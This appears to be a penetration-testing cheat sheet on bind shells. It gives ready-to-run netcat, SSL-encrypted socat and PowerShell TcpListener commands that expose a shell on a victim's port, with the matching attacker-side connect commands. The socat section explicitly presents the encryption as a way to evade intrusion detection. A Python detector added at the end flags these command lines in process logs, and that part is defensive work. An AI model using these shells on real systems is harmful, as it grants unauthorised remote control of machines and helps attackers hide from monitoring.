# Bind Shell

## Netcat

On the victim machine, run the following command:

```bash
victim> $ nc -nlvp 4444 -e /bin/bash
```

On the attacker side, connect to the victim with this command:

```bash
attacker> $ nc -nv <victim.IP> 4444
```

## Socat

To add encryption to a bind shell, rely on Secure Sockets Layer (SSL) certificates. This level of encryption helps evade intrusion detection systems (IDS) and hides the sensitive data exchanged over the connection.

First, create a self-signed certificate:

```bash
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
```

Now that the key and certificate have been generated, convert them to a format socat will accept. To do so, combine both the **bind\_shell.key** and **bind\_shell.crt** files into a single **.pem** file before creating the encrypted socat listener.

```bash
victim> $ cat bind_shell.key bind_shell.crt > bind_shell.pem
victim> $ sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
```

Now, connect the attacker's computer to the victim's bind shell.

```bash
attacker> $ socat - OPENSSL:10.11.0.4:443,verify=0
```

## PowerShell

On the victim command prompt, run the following command:

```powershell
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
```

Then, on the attacker machine, connect to it using netcat:

```bash
attacker> $ nc -nv <victim.IP> 443
```
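The three listeners above share one trait a defender can key on: a process command line that binds a port and hands the connection to a shell or to `iex`. The following Python check is an added example, not part of the original page; the pattern names, the `classify` and `scan` helpers, and the sample command lines are constructed for illustration and assume process-creation logging (auditd execve records or Sysmon Event ID 1) is available.

```python
import re

# Constructed process-creation command lines (the kind auditd execve or Sysmon
# Event ID 1 records carry); the first three mirror the listeners on this page.
SAMPLE_CMDLINES = [
    "nc -nlvp 4444 -e /bin/bash",
    "sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash",
    '''powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$sendback = (iex $data 2>&1 | Out-String)"''',
    "nc -nv 10.0.0.5 4444",                    # client side only, no listener
    "nc -l 8080",                              # listener, but no program attached
    "socat - OPENSSL:10.11.0.4:443,verify=0",  # client side only
]

def classify(cmdline):
    """Return the bind-shell pattern a command line matches, or None."""
    argv = cmdline.split()
    if argv and argv[0] == "sudo":
        argv = argv[1:]
    if not argv:
        return None
    # Reduce a full path such as /usr/bin/ncat or C:\tools\nc.exe to its name.
    prog = re.split(r"[\\/]", argv[0])[-1].lower()
    prog = prog[:-4] if prog.endswith(".exe") else prog
    args = argv[1:]
    if prog in ("nc", "ncat", "netcat"):
        # Short flags may be clustered (-nlvp), so collect every flag letter.
        flags = "".join(a[1:] for a in args if re.fullmatch(r"-[A-Za-z]+", a))
        if "l" in flags and "e" in flags:
            return "netcat-listen-exec"
    elif prog == "socat":
        # socat address keywords are case-insensitive.
        upper = [a.upper() for a in args]
        listens = any(re.match(r"(OPENSSL|TCP[46]?)-LISTEN:", a) for a in upper)
        execs = any(a.startswith(("EXEC:", "SYSTEM:")) for a in upper)
        if listens and execs:
            return "socat-listen-exec"
    elif prog in ("powershell", "pwsh"):
        # A TcpListener whose input is fed to Invoke-Expression (alias iex).
        if re.search(r"TcpListener", cmdline, re.I) and re.search(
                r"\b(iex|Invoke-Expression)\b", cmdline, re.I):
            return "powershell-tcplistener-iex"
    return None

def scan(cmdlines):
    hits = [(classify(c), c) for c in cmdlines]
    return [h for h in hits if h[0] is not None]

if __name__ == "__main__":
    for pattern, cmd in scan(SAMPLE_CMDLINES):
        print(f"{pattern}: {cmd}")
```

Command-line matching only catches the forms shown here; pairing it with an inventory of listening sockets and their owning processes covers renamed binaries.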

